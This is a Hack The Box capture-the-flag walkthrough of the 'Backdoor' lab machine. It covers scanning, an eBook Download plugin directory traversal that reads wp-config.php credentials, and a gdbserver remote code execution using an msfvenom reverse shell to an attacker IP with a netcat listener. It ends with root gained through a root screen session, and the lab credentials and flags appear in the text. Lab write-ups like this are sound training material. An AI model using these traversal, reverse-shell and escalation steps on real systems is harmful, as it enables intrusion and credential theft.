HTB Backdoor done
Backdoor¶
Notes¶
Scan Wordpress
Check port 1337 ?
OS:¶
Linux
Technology:¶
WordPress 5.8.1
IP Address:¶
10.129.170.20
Open ports:¶
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
1337/tcp open waste?
Users and pass:¶
Wordpress user:
L: admin
---
Creds for wordpress DB:
DB_NAME', 'wordpress'
DB_USER', 'wordpressuser'
DB_PASSWORD', 'MQYBJSaD#DxG6qbm'
DB_HOST', 'localhost'
Nmap¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.170.20_nmap 10.129.170.20 ; cat 10.129.170.20_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-08 12:24 CEST
Nmap scan report for 10.129.170.20
Host is up (0.059s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Backdoor – Real-Life
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
1337/tcp open waste?
Ffuz¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ ffuf -u http://10.129.170.20/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.170.20_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.170.20/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.170.20_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 46ms]
license.txt [Status: 200, Size: 19915, Words: 3331, Lines: 385, Duration: 33ms]
readme.html [Status: 200, Size: 7346, Words: 740, Lines: 98, Duration: 33ms]
wp-admin [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: http://10.129.170.20/wp-admin/FUZZ
wp-content [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: http://10.129.170.20/wp-content/FUZZ
wp-config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 46ms]
wp-includes [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://10.129.170.20/wp-includes/FUZZ
wp-login.php [Status: 200, Size: 5695, Words: 282, Lines: 99, Duration: 49ms]
wp-trackback.php [Status: 200, Size: 135, Words: 11, Lines: 5, Duration: 48ms]
xmlrpc.php [Status: 405, Size: 42, Words: 6, Lines: 1, Duration: 80ms]
[INFO] Starting queued job on target: http://10.129.170.20/wp-admin/FUZZ
about.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
admin.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 48ms]
comment.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 56ms]
credits.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 49ms]
css [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-admin/css/
customize.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 159ms]
edit.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 56ms]
export.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
images [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 36ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-admin/images/
import.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
includes [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-admin/includes/
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 48ms]
install.php [Status: 200, Size: 1281, Words: 73, Lines: 17, Duration: 81ms]
js [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 44ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-admin/js/
link.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 48ms]
maint [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 74ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-admin/maint/
media.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 61ms]
menu.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
moderation.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 48ms]
network [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-admin/network/
network.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
options.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
plugins.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 64ms]
post.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 48ms]
privacy.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 69ms]
profile.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
revision.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 56ms]
term.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
themes.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
tools.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
update.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
upgrade.php [Status: 200, Size: 1251, Words: 66, Lines: 24, Duration: 73ms]
upload.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 42ms]
user [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-admin/user/
users.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 49ms]
widgets.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 65ms]
[INFO] Starting queued job on target: http://10.129.170.20/wp-content/FUZZ
index.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 35ms]
plugins [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-content/plugins/
themes [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-content/themes/
upgrade [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-content/upgrade/
uploads [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-content/uploads/
[INFO] Starting queued job on target: http://10.129.170.20/wp-includes/FUZZ
assets [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/assets/
blocks.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
blocks [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 31ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/blocks/
bookmark.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
cache.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
category.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
certificates [Status: 301, Size: 333, Words: 20, Lines: 10, Duration: 43ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/certificates/
comment.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
compat.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
cron.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 39ms]
css [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/css/
customize [Status: 301, Size: 330, Words: 20, Lines: 10, Duration: 40ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/customize/
date.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 42ms]
deprecated.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
embed.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
feed.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 39ms]
fonts [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 68ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/fonts/
formatting.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 33ms]
functions.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
http.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
images [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/images/
js [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 60ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/js/
l10n.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
load.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
locale.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 39ms]
media.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 33ms]
meta.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
option.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
plugin.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
post.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
query.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 33ms]
registration.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
revision.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
rewrite.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 40ms]
rss.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
session.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
sitemaps [Status: 301, Size: 329, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/sitemaps/
sitemaps.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
taxonomy.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 40ms]
template.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
theme.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
update.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 66ms]
user.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
vars.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 33ms]
version.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
widgets [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.170.20/wp-includes/widgets/
widgets.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
:: Progress: [163752/163752] :: Job [4/4] :: 1197 req/sec :: Duration: [0:02:42] :: Errors: 0 ::
Add IP to /etc/hosts¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ cat /etc/hosts | grep 10.129.170.20
10.129.170.20 backdoor.htb
WPscan enum users - http://backdoor.htb¶
I found user: admin
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ docker run -it --rm wpscanteam/wpscan --url http://backdoor.htb/ --enumerate u | tee backdoor.htb_wpscan_users
Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://backdoor.htb/ [10.129.170.20]
[+] Started: Tue Jul 8 11:36:04 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://backdoor.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.9
| Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=======================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://backdoor.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 8 11:36:10 2025
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 13.605 KB
[+] Data Received: 573.331 KB
[+] Memory used: 186.688 MB
[+] Elapsed time: 00:00:05
WPscan enum plugins aggressive - http://backdoor.htb¶
I found vuln plugin:
ebook-download
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ docker run -it --rm wpscanteam/wpscan --url http://backdoor.htb/ --enumerate ap --plugins-detection aggressive | tee backdoor.htb_wpscan_plugins
Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://backdoor.htb/ [10.129.170.20]
[+] Started: Tue Jul 8 11:34:29 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://backdoor.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.9
| Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:17:37 <===============================> (111532 / 111532) 100.00% Time: 00:17:37
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 5.4
| Last Updated: 2025-05-07T16:30:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] ebook-download
| Location: http://backdoor.htb/wp-content/plugins/ebook-download/
| Last Updated: 2020-03-12T12:52:00.000Z
| Readme: http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
| [!] The version is out of date, the latest version is 1.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/, status: 200
|
| Version: 1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 8 11:52:26 2025
[+] Requests Done: 111573
[+] Cached Requests: 8
[+] Data Sent: 29.96 MB
[+] Data Received: 15.401 MB
[+] Memory used: 416.621 MB
[+] Elapsed time: 00:17:57
Exploit: WordPress Plugin eBook Download 1.1 - Directory Traversal¶
WordPress Plugin eBook Download 1.1 - Directory Traversal
Read file: wp-config.php¶
I found creds:
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
---
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
Read PID's info remote host¶
I found, gdbserver as server on port 1337
978 bin sh-cwhile true;do su user -c "cd home user;gdbserver --once 0.0.0.0:1337 bin
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ for i in {1..1000}; do curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/"$i"/cmdline --output -; echo; done > pids.txt
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ cat t | grep -aE "[a-zA-Z]" | grep -a while
977 bin sh-cwhile true;do sleep 1;find var run screen
978 bin sh-cwhile true;do su user -c "cd home user;gdbserver --once 0.0.0.0:1337 bin
Exploit: GNU gdbserver 9.2 - Remote Command Execution (RCE)¶
GNU gdbserver 9.2 - Remote Command Execution (RCE)
Revshell¶
1 Create revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.111 LPORT=4444 PrependFork=true -o rev.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Saved as: rev.bin
---
2 Run exploit
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ python3 50539.py backdoor.htb:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener
---
3 Start netcat
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Backdoor]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.96.68] 43502
---
4 Spawning TTY
script /dev/null -c bash
CTRL+Z
stty raw -echo ; fg
reset
screen
Read flag: user.txt¶
user@Backdoor:/home/user$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@Backdoor:/home/user$ ls -a
. .bash_history .cache .gnupg .profile
.. .bashrc .config .local user.txt
user@Backdoor:/home/user$
user@Backdoor:/home/user$ cat user.txt
e5f30f048639f42c9f99fcc63f39eb5b
user@Backdoor:/home/user$
Privilege Escalation¶
screen¶
user@Backdoor:/home/user$ ps aux | grep screen
root 972 0.0 0.0 2608 1760 ? Ss 07:58 0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
user 5539 0.0 0.0 3304 732 pts/1 R+ 08:27 0:00 grep --color=auto screen
user@Backdoor:/home/user$
user@Backdoor:/home/user$ screen -ls
No Sockets found in /run/screen/S-user.
user@Backdoor:/home/user$ screen -ls root
No Sockets found in /run/screen/S-user.
user@Backdoor:/home/user$ screen -ls root/
There is a suitable screen on:
5378.root (07/11/25 08:26:30) (Multi, detached)
1 Socket in /run/screen/S-root.
user@Backdoor:/home/user$
user@Backdoor:/home/user$ screen -r root/5378.root
Read flag: root.txt¶
root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~#
root@Backdoor:~# cd ~
root@Backdoor:~# ls -a
. .bash_history .cache .local .profile root.txt .ssh
.. .bashrc .config .mysql_history .reset .screenrc
root@Backdoor:~# cat root.txt
c7103e0b939693f3087943feea7acd02
root@Backdoor:~#
References¶
[WordPress Plugin eBook Download 1.1 - Directory Traversal](https://www.exploit-db.com/exploits/39575)
[GNU gdbserver 9.2 - Remote Command Execution (RCE)](https://www.exploit-db.com/exploits/50539)
Lessons Learned¶
Tags¶